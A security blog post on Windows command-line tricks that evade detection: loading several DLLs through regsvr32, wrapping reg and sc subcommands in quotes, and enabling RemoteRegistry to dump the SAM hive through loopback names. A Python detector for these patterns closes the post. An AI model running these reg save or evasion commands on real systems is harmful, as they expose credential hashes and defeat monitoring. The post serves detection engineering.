1 little-known secret of regsvr32.exe

The little-known secret of regsvr32.exe is…

You ready?

You can load multiple DLLs at the same time.

Yup. And not just one extra, but many.

Let’s have a look at an example:

regsvr32.exe c:\WINDOWS\system32\hhctrl.ocx foo

will first load c:\WINDOWS\system32\hhctrl.ocx and then foo.dll.

We can do it multiple times:

regsvr32.exe hhctrl.ocx hhctrl.ocx hhctrl.ocx hhctrl.ocx hhctrl.ocx foo

2 lesser-known secrets of Windows command-driven command-line tools…

Many Windows tools support subcommands, for example:

  • reg.exe – QUERY, ADD, DELETE, COPY, SAVE, RESTORE, LOAD, UNLOAD, COMPARE, EXPORT, IMPORT, FLAGS
  • sc.exe – config, continue, control, create, delete, description, EnumDepend, failure, failureflag, GetDisplayName, GetKeyName, interrogate, managedaccount, pause, preferrednode, privs, qc, qdescription, qfailure, qfailureflag, qmanagedaccount, qpreferrednode, qprivs, qprotection, qsidtype, qtriggerinfo, query, queryex, quserservice, sdset, sdshow, showsid, sidtype, start, stop, triggerinfo
  • netsh.exe – ?, add, advfirewall, branchcache, bridge, delete, dhcpclient, dnsclient, dump, exec, firewall, help, http, interface, ipsec, lan, mbn, namespace, netio, p2p, ras, rpc, set, show, trace, wcn, wfp, winhttp, winsock, wlan
  • fsutil.exe – 8dot3name, behavior, dax, dirty, file, fsInfo, hardlink, objectID, quota, repair, reparsePoint, resource, sparse, storageReserve, tiering, transaction, usn, volume, wim

We are used to invoking them in the form tool command, but there is an alternative way: the command can be wrapped in double quotes, for example:

  • reg.exe "query" is identical with reg.exe query
  • sc.exe "start" is identical with sc start
  • etc.

This breaks many hard-coded detections.

The second secret is the omnipresent support for everything ‘remote’, that is – operations that can be executed on other endpoints.

As such, one can use computer names in many of these commands; for example, registry keys passed to the reg.exe command can be prefixed with a host name. This includes localhost, 127.0.0.1 and ::1, yet notably, for these to work the RemoteRegistry service needs to be running on the local host. It's actually very easy to enable:

sc config remoteregistry start= auto
sc start remoteregistry

and then we can easily run one of these:

reg save \\127.0.0.1\hklm\sam sam
reg save \\localhost\hklm\sam sam
reg save \\::1\hklm\sam sam
reg "save" \\127.0.0.1\hklm\sam sam
reg "save" \\localhost\hklm\sam sam
reg "save" \\::1\hklm\sam sam

This will break many detections too.
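To show what a detection that survives these tricks looks like, here is an added Python example (not from the original post) that normalizes a process command line before matching: quotes around tokens are dropped, loopback "remote" prefixes are stripped, and every non-switch regsvr32 argument counts as a module to load. The command lines it is fed are the ones from the post; the finding names are my own labels.

```python
import re

# Loopback forms the post shows for making a "remote" registry operation hit
# the local machine; stripped before matching so all spellings look alike.
LOOPBACK = re.compile(r"\\\\(127\.0\.0\.1|localhost|::1)\\", re.IGNORECASE)
SENSITIVE_HIVES = ("hklm\\sam", "hklm\\security", "hklm\\system")


def normalize(cmdline: str) -> list[str]:
    """Tokenize, drop surrounding quotes, lowercase, and strip loopback prefixes."""
    out = []
    for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline):
        tok = (quoted or bare).lower()
        out.append(LOOPBACK.sub("", tok))  # \\::1\hklm\sam -> hklm\sam
    return out


def detect(cmdline: str) -> list[str]:
    """Return the evasion patterns from the post that a command line exhibits."""
    toks = normalize(cmdline)
    if not toks:
        return []
    exe = toks[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    args = toks[1:]
    findings = []
    # Quotes around a token with no whitespace serve no purpose except to
    # defeat substring matches such as 'reg save' or 'sc start'.
    if re.search(r'"[^"\s]+"', cmdline):
        findings.append("quoted-subcommand")
    if LOOPBACK.search(cmdline):
        findings.append("loopback-as-remote")
    if exe == "regsvr32":
        # every argument that is not a switch is another module to load
        modules = [a for a in args if not a.startswith(("/", "-"))]
        if len(modules) > 1:
            findings.append("regsvr32-multiple-modules:%d" % len(modules))
    if exe == "reg" and len(args) >= 2 and args[0] == "save":
        if args[1].startswith(SENSITIVE_HIVES):
            findings.append("reg-save-sensitive-hive:" + args[1])
    # enabling RemoteRegistry is the precondition for the loopback trick
    if exe == "sc" and args[:1] in (["config"], ["start"]) and "remoteregistry" in args:
        findings.append("remoteregistry-enable")
    return findings


if __name__ == "__main__":
    for line in (r'reg "save" \\::1\hklm\sam sam',
                 "regsvr32.exe hhctrl.ocx hhctrl.ocx hhctrl.ocx hhctrl.ocx hhctrl.ocx foo"):
        print(line, "->", detect(line))
```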